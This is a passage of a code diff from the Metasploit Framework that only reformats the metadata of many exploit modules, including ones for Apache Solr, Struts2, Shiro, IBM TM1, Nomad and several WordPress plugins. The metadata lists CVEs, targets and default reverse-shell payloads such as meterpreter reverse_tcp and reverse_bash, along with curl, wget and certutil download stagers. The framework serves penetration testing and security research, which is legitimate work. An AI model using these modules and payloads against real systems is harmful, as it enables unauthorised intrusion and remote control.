+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
+          [ 'CVE', '2020-11853'],
+          [ 'CVE', '2020-11854'],
+          [ 'ZDI', '20-1287'],
+          [ 'ZDI', '20-1288'],
+        ],
         'Privileged' => true,
         'Platform' => %w[unix win],
-        'DefaultOptions' =>
-          {
-            'WfsDelay' => 15
-          },
-        'Targets' =>
-          # unfortunately could not find a way to determine target automatically
+        'DefaultOptions' => {
+          'WfsDelay' => 15
+        },
+        # unfortunately could not find a way to determine target automatically
+        'Targets' => [
           [
-            [
-              'Windows',
-              {
-                'Platform' => 'win',
-                'DefaultOptions' =>
-                { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
-              },
-            ],
-            [
-              'Linux',
-              {
-                'Platform' => 'unix',
-                'Arch' => [ARCH_CMD],
-                'DefaultOptions' =>
-                { 'PAYLOAD' => 'cmd/unix/reverse_python' }
-              },
-            ]
+            'Windows',
+            {
+              'Platform' => 'win',
+              'DefaultOptions' =>
+              { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
+            },
           ],
+          [
+            'Linux',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' =>
+              { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+            },
+          ]
+        ],
         'DisclosureDate' => '2020-10-28',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -33,14 +33,13 @@ class MetasploitModule < Msf::Exploit::Remote
           'neex',          # (Emil Lerner) Discovery and original exploit code
           'cdelafuente-r7' # This module
         ],
-        'References' =>
-          [
-            ['CVE', '2019-11043'],
-            ['EDB', '47553'],
-            ['URL', 'https://github.com/neex/phuip-fpizdam'],
-            ['URL', 'https://bugs.php.net/bug.php?id=78599'],
-            ['URL', 'https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html']
-          ],
+        'References' => [
+          ['CVE', '2019-11043'],
+          ['EDB', '47553'],
+          ['URL', 'https://github.com/neex/phuip-fpizdam'],
+          ['URL', 'https://bugs.php.net/bug.php?id=78599'],
+          ['URL', 'https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html']
+        ],
         'DisclosureDate' => '2019-10-22',
         'License' => MSF_LICENSE,
         'Payload' => {

--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -17,21 +17,18 @@ class MetasploitModule < Msf::Exploit::Remote
           This module can detect and exploit the backdoor of PHPStudy.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Dimensional',  # POC
-            'Airevan'       # Metasploit Module
-          ],
+        'Author' => [
+          'Dimensional', # POC
+          'Airevan'       # Metasploit Module
+        ],
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
-        'Targets' =>
-          [
-            ['PHPStudy 2016-2018', {}]
-          ],
-        'References' =>
-          [
-            ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
-          ],
+        'Targets' => [
+          ['PHPStudy 2016-2018', {}]
+        ],
+        'References' => [
+          ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2019-09-20',
         'DefaultTarget' => 0

--- a/modules/exploits/multi/http/playsms_template_injection.rb
+++ b/modules/exploits/multi/http/playsms_template_injection.rb
@@ -23,31 +23,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
           This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.
         },
-        'Author' =>
-            [
-              'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
-              'Lucas Rosevear' # Found and Initial PoC by NCC Group
-            ],
+        'Author' => [
+          'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
+          'Lucas Rosevear' # Found and Initial PoC by NCC Group
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-            [
-              ['CVE', '2020-8644'],
-              ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
-              ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
-            ],
-        'DefaultOptions' =>
-            {
-              'SSL' => false,
-              'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-              'ENCODER' => 'php/base64'
-            },
+        'References' => [
+          ['CVE', '2020-8644'],
+          ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
+          ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'ENCODER' => 'php/base64'
+        },
         'Privileged' => false,
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
-        'Targets' =>
-            [
-              [ 'PlaySMS Before 1.4.3', {} ],
-            ],
+        'Targets' => [
+          [ 'PlaySMS Before 1.4.3', {} ],
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-02-05'
       )

--- a/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
+++ b/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
@@ -22,42 +22,38 @@ class MetasploitModule < Msf::Exploit::Remote
           cookies is known.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'L / l-codes[at]qq.com' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['CVE', '2016-4437'],
-            ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1']
-          ],
+        'Author' => [
+          'L / l-codes[at]qq.com' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2016-4437'],
+          ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1']
+        ],
         'Platform' => %w[win unix],
         'Arch' => [ ARCH_CMD ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Unix Command payload',
-              {
-                'Arch' => ARCH_CMD,
-                'Platform' => 'unix',
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-              }
-            ],
-            [
-              'Windows Command payload',
-              {
-                'Arch' => ARCH_CMD,
-                'Platform' => 'win'
-              }
-            ]
+            'Unix Command payload',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
           ],
+          [
+            'Windows Command payload',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win'
+            }
+          ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2016-06-07',
         'Privileged' => false,
-        'DefaultOptions' =>
-          {
-            'WfsDelay' => 5
-          }
+        'DefaultOptions' => {
+          'WfsDelay' => 5
+        }
       )
     )
     register_options(

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -29,83 +29,80 @@ class MetasploitModule < Msf::Exploit::Remote
           template parameter in a specially crafted Solr request, leading to RCE.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            's00py', # Discovery and PoC
-            'jas502n', # exploit code on Github
-            'AleWong', # ExploitDB contribution, and exploit code on Github
-            'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
-          ],
-        'References' =>
-            [
-              [ 'EDB', '47572' ],
-              [ 'CVE', '2019-17558' ],
-              [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
-              [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
-              [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
-              [ 'URL', 'https://github.com/jas502n/solr_rce'],
-              [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
-            ],
+        'Author' => [
+          's00py', # Discovery and PoC
+          'jas502n', # exploit code on Github
+          'AleWong', # ExploitDB contribution, and exploit code on Github
+          'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+        ],
+        'References' => [
+          [ 'EDB', '47572' ],
+          [ 'CVE', '2019-17558' ],
+          [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
+          [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
+          [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
+          [ 'URL', 'https://github.com/jas502n/solr_rce'],
+          [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
+        ],
         'Platform' => ['linux', 'unix', 'win'],
-        'Targets' =>
-            [
-              [
-                'Java (in-memory)',
-                {
-                  'Platform' => 'java',
-                  'Arch' => ARCH_JAVA,
-                  'Type' => :java,
-                  'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' }
-                }
-              ],
-              [
-                'Unix (in-memory)',
-                {
-                  'Platform' => 'unix',
-                  'Arch' => ARCH_CMD,
-                  'Type' => :unix_memory,
-                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-                }
-              ],
-              [
-                'Linux (dropper)',
-                {
-                  'Platform' => 'linux',
-                  'Arch' => [ARCH_X86, ARCH_X64],
-                  'Type' => :linux_dropper,
-                  'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
-                  'CmdStagerFlavor' => %w[curl wget]
-                }
-              ],
-              [
-                'x86/x64 Windows PowerShell',
-                {
-                  'Platform' => 'win',
-                  'Arch' => [ARCH_X86, ARCH_X64],
-                  'Type' => :windows_psh,
-                  'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
-                }
-              ],
-              [
-                'x86/x64 Windows CmdStager',
-                {
-                  'Platform' => 'win',
-                  'Arch' => [ARCH_X86, ARCH_X64],
-                  'Type' => :windows_cmdstager,
-                  'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
-                  'CmdStagerFlavor' => %w[vbs certutil]
-                }
-              ],
-              [
-                'Windows Exec',
-                {
-                  'Platform' => 'win',
-                  'Arch' => ARCH_CMD,
-                  'Type' => :windows_exec,
-                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' }
-                }
-              ],
-            ],
+        'Targets' => [
+          [
+            'Java (in-memory)',
+            {
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'Type' => :java,
+              'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix (in-memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux (dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'CmdStagerFlavor' => %w[curl wget]
+            }
+          ],
+          [
+            'x86/x64 Windows PowerShell',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_psh,
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'x86/x64 Windows CmdStager',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_cmdstager,
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
+              'CmdStagerFlavor' => %w[vbs certutil]
+            }
+          ],
+          [
+            'Windows Exec',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_exec,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' }
+            }
+          ],
+        ],
         'DisclosureDate' => '2019-10-29', # ISO-8601 formatted
         'DefaultTarget' => 0,
         'Privileged' => false

--- a/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_multi_eval_ognl.rb
@@ -62,12 +62,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE, ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-            'Reliability' => [ REPEATABLE_SESSION, ]
-          },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        },
         'DefaultTarget' => 0
       )
     )

--- a/modules/exploits/multi/http/wp_ait_csv_rce.rb
+++ b/modules/exploits/multi/http/wp_ait_csv_rce.rb
@@ -23,28 +23,25 @@ class MetasploitModule < Msf::Exploit::Remote
           required to be activated to be exploitable.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            # 0day according to wpvdb
-            'h00die', # msf module
-          ],
-        'References' =>
-          [
-            [ 'URL', 'https://www.ait-themes.club/wordpress-plugins/csv-import-export/#changelog-popup' ],
-            [ 'WPVDB', '10471' ]
-          ],
+        'Author' => [
+          # 0day according to wpvdb
+          'h00die', # msf module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.ait-themes.club/wordpress-plugins/csv-import-export/#changelog-popup' ],
+          [ 'WPVDB', '10471' ]
+        ],
         'Platform' => [ 'php' ],
         'Privileged' => false,
         'Arch' => ARCH_PHP,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'AIT CSV Import Export <3.0.4',
-              {
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
-              }
-            ]
-          ],
+            'AIT CSV Import Export <3.0.4',
+            {
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
         'DisclosureDate' => '2020-11-14', # 0day detected by wpvdb
         'DefaultTarget' => 0
       )

--- a/modules/exploits/multi/http/wp_dnd_mul_file_rce.rb
+++ b/modules/exploits/multi/http/wp_dnd_mul_file_rce.rb
@@ -22,24 +22,21 @@ class MetasploitModule < Msf::Exploit::Remote
           No authentication is required for exploitation.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Austin Martin <amartin@amartinsec.com>' # original PoC, discovery
-          ],
-        'References' =>
-          [
-            ['EDB', '48520'],
-            ['CVE', '2020-12800'],
-            ['URL', 'https://github.com/amartinsec/CVE-2020-12800']
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Austin Martin <amartin@amartinsec.com>' # original PoC, discovery
+        ],
+        'References' => [
+          ['EDB', '48520'],
+          ['CVE', '2020-12800'],
+          ['URL', 'https://github.com/amartinsec/CVE-2020-12800']
+        ],
         'Platform' => ['php'],
         'Privileged' => false,
         'Arch' => ARCH_PHP,
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2020-05-11',
         'DefaultTarget' => 0,
         'Notes' => {

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -22,29 +22,26 @@ class MetasploitModule < Msf::Exploit::Remote
           PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Alex Souza (w4fz5uck5)', # initial discovery and PoC
-            'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
-          ],
-        'References' =>
-          [
-            [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
-            [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
-            [ 'CVE', '2020-25213' ]
-          ],
+        'Author' => [
+          'Alex Souza (w4fz5uck5)', # initial discovery and PoC
+          'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
+          [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
+          [ 'CVE', '2020-25213' ]
+        ],
         'Platform' => [ 'php' ],
         'Privileged' => false,
         'Arch' => ARCH_PHP,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'WordPress File Manager 6.0-6.8',
-              {
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
-              }
-            ]
-          ],
+            'WordPress File Manager 6.0-6.8',
+            {
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
         'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
         'DefaultTarget' => 0
       )

--- a/modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
@@ -23,34 +23,30 @@ class MetasploitModule < Msf::Exploit::Remote
           Then, the uploaded payload can be triggered by a call to `/wp-content/uploads/backup-guard/<random_payload_name>.php`
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Nguyen Van Khanh', # Original PoC, discovery
-            'Ron Jost', # Exploit-db
-            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '50093'],
-            ['CVE', '2021-24155'],
-            ['CWE', '434'],
-            ['WPVDB', 'd442acac-4394-45e4-b6bb-adf4a40960fb'],
-            ['URL', 'https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2473510%40backup&old=2472212%40backup&sfp_email=&sfph_mail=']
-          ],
+        'Author' => [
+          'Nguyen Van Khanh', # Original PoC, discovery
+          'Ron Jost', # Exploit-db
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '50093'],
+          ['CVE', '2021-24155'],
+          ['CWE', '434'],
+          ['WPVDB', 'd442acac-4394-45e4-b6bb-adf4a40960fb'],
+          ['URL', 'https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2473510%40backup&old=2472212%40backup&sfp_email=&sfph_mail=']
+        ],
         'Platform' => [ 'php' ],
         'Arch' => ARCH_PHP,
-        'Targets' =>
-        [
+        'Targets' => [
           [ 'Wordpress Backup Guard < 1.6.0', {}]
         ],
         'Privileged' => false,
         'DisclosureDate' => '2021-05-04',
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
       )
     )
 

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -24,32 +24,28 @@ class MetasploitModule < Msf::Exploit::Remote
           Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Nguyen Van Khanh', # Original PoC and discovery
-            'Ron Jost', # Exploit-db
-            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '50115'],
-            ['CVE', '2021-24145'],
-            ['CWE', '434']
-          ],
+        'Author' => [
+          'Nguyen Van Khanh', # Original PoC and discovery
+          'Ron Jost', # Exploit-db
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '50115'],
+          ['CVE', '2021-24145'],
+          ['CWE', '434']
+        ],
         'Platform' => [ 'php' ],
         'Arch' => ARCH_PHP,
-        'Targets' =>
-        [
+        'Targets' => [
           [ 'Wordpress Modern Events Calendar < 5.16.5', {}]
         ],
         'Privileged' => false,
         'DisclosureDate' => '2021-01-29',
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
       )
     )
 

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -23,30 +23,26 @@ class MetasploitModule < Msf::Exploit::Remote
           Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Ron Jost', # Exploit-db
-            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '50115'],
-            ['CVE', '2021-24347']
-          ],
+        'Author' => [
+          'Ron Jost', # Exploit-db
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '50115'],
+          ['CVE', '2021-24347']
+        ],
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
-        'Targets' =>
-        [
+        'Targets' => [
           ['Wordpress SP Project & Document < 4.22', {}]
         ],
         'Privileged' => false,
         'DisclosureDate' => '2021-06-14',
-        'Notes' =>
-          {
-            'Stability' => [CRASH_SAFE],
-            'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-            'Reliability' => [REPEATABLE_SESSION]
-          }
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
       )
     )
 

--- a/modules/exploits/multi/http/wp_simple_file_list_rce.rb
+++ b/modules/exploits/multi/http/wp_simple_file_list_rce.rb
@@ -22,30 +22,27 @@ class MetasploitModule < Msf::Exploit::Remote
           to php and executed.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'coiffeur', # initial discovery and PoC
-            'h00die', # msf module
-          ],
-        'References' =>
-          [
-            [ 'URL', 'https://wpscan.com/vulnerability/10192' ],
-            [ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ],
-            [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ],
-            [ 'EDB', '48349' ]
-          ],
+        'Author' => [
+          'coiffeur', # initial discovery and PoC
+          'h00die', # msf module
+        ],
+        'References' => [
+          [ 'URL', 'https://wpscan.com/vulnerability/10192' ],
+          [ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ],
+          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ],
+          [ 'EDB', '48349' ]
+        ],
         'Platform' => [ 'php' ],
         'Privileged' => false,
         'Arch' => ARCH_PHP,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Default',
-              {
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
-              }
-            ]
-          ],
+            'Default',
+            {
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
         'DisclosureDate' => '2020-04-27',
         'DefaultTarget' => 0,
         'Notes' => {

--- a/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
+++ b/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
@@ -33,81 +33,77 @@ class MetasploitModule < Msf::Exploit::Remote
           earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
+        'Author' => [
+          'Pedro Ribeiro <pedrib@gmail.com>',
+          # Vulnerability discovery and Metasploit module
+          'Gareth Batchelor <gbatchelor@cloudtrace.com.au>'
+          # Real world exploit testing and feedback
+        ],
+        'References' => [
+          [ 'CVE', '2019-4716' ],
+          [ 'URL', 'https://www.ibm.com/support/pages/node/1127781' ],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_tm1_rce.md' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Mar/44' ]
+        ],
+        'Targets' => [
           [
-            'Pedro Ribeiro <pedrib@gmail.com>',
-            # Vulnerability discovery and Metasploit module
-            'Gareth Batchelor <gbatchelor@cloudtrace.com.au>'
-            # Real world exploit testing and feedback
+            'Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
           ],
-        'References' =>
           [
-            [ 'CVE', '2019-4716' ],
-            [ 'URL', 'https://www.ibm.com/support/pages/node/1127781' ],
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_tm1_rce.md' ],
-            [ 'URL', 'https://seclists.org/fulldisclosure/2020/Mar/44' ]
+            'Windows (Command)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_CMD],
+              'Payload' =>
+              {
+                # Plenty of bad chars in Windows... there might be more lurking
+                'BadChars' => "\x25\x26\x27\x3c\x3e\x7c"
+              }
+            }
           ],
-        'Targets' =>
           [
-            [
-              'Windows',
-              {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'Windows (Command)',
-              {
-                'Platform' => 'win',
-                'Arch' => [ARCH_CMD],
-                'Payload' =>
-                {
-                  # Plenty of bad chars in Windows... there might be more lurking
-                  'BadChars' => "\x25\x26\x27\x3c\x3e\x7c"
-                }
-              }
-            ],
-            [
-              'Linux',
-              {
-                'Platform' => 'linux',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'Linux (Command)',
-              {
-                'Platform' => 'unix',
-                'Arch' => [ARCH_CMD],
-                'Payload' =>
-                {
-                  # only one bad char in Linux, baby! (that we know of...)
-                  'BadChars' => "\x27"
-                }
-              }
-            ],
-            [
-              'AIX (Command)',
-              {
-                # This should work on AIX, but it was not tested!
-                'Platform' => 'unix',
-                'Arch' => [ARCH_CMD],
-                'Payload' =>
-                {
-                  # untested, but assumed to be similar to Linux
-                  'BadChars' => "\x27"
-                }
-              }
-            ],
+            'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
           ],
+          [
+            'Linux (Command)',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD],
+              'Payload' =>
+              {
+                # only one bad char in Linux, baby! (that we know of...)
+                'BadChars' => "\x27"
+              }
+            }
+          ],
+          [
+            'AIX (Command)',
+            {
+              # This should work on AIX, but it was not tested!
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD],
+              'Payload' =>
+              {
+                # untested, but assumed to be similar to Linux
+                'BadChars' => "\x27"
+              }
+            }
+          ],
+        ],
         'Stance' => Msf::Exploit::Stance::Aggressive,
         # we need this to run in the foreground
-        'DefaultOptions' =>
-          {
-            # give the target lots of time to download the payload
-            'WfsDelay' => 30
-          },
+        'DefaultOptions' => {
+          # give the target lots of time to download the payload
+          'WfsDelay' => 30
+        },
         'Privileged' => true,
         'DisclosureDate' => '2019-12-19',
         'DefaultTarget' => 0

--- a/modules/exploits/multi/misc/nomad_exec.rb
+++ b/modules/exploits/multi/misc/nomad_exec.rb
@@ -22,33 +22,30 @@ class MetasploitModule < Msf::Exploit::Remote
           Regular 'exec' jobs can be created in a similar fashion at a lower privilege level.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
+        'Author' => [
+          'Wyatt Dahlenburg (@wdahlenb)',
+        ],
+        'References' => [
+          [ 'URL', 'https://www.nomadproject.io/' ]
+        ],
+        'Targets' => [
           [
-            'Wyatt Dahlenburg (@wdahlenb)',
+            'Linux',
+            {
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => ['bourne', 'echo', 'printf', 'curl', 'wget'],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'WfsDelay' => 10 }
+            }
           ],
-        'References' =>
           [
-            [ 'URL', 'https://www.nomadproject.io/' ]
-          ],
-        'Targets' =>
-          [
-            [
-              'Linux',
-              {
-                'Platform' => 'linux',
-                'CmdStagerFlavor' => ['bourne', 'echo', 'printf', 'curl', 'wget'],
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'WfsDelay' => 10 }
-              }
-            ],
-            [
-              'Windows',
-              {
-                'Platform' => 'win',
-                'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'certutil', 'vbs' ],
-                'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'WfsDelay' => 10 }
-              }
-            ]
-          ],
+            'Windows',
+            {
+              'Platform' => 'win',
+              'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'certutil', 'vbs' ],
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'WfsDelay' => 10 }
+            }
+          ]
+        ],
         'Payload' => {},
         'Privileged' => false,
         'DefaultTarget' => 0,

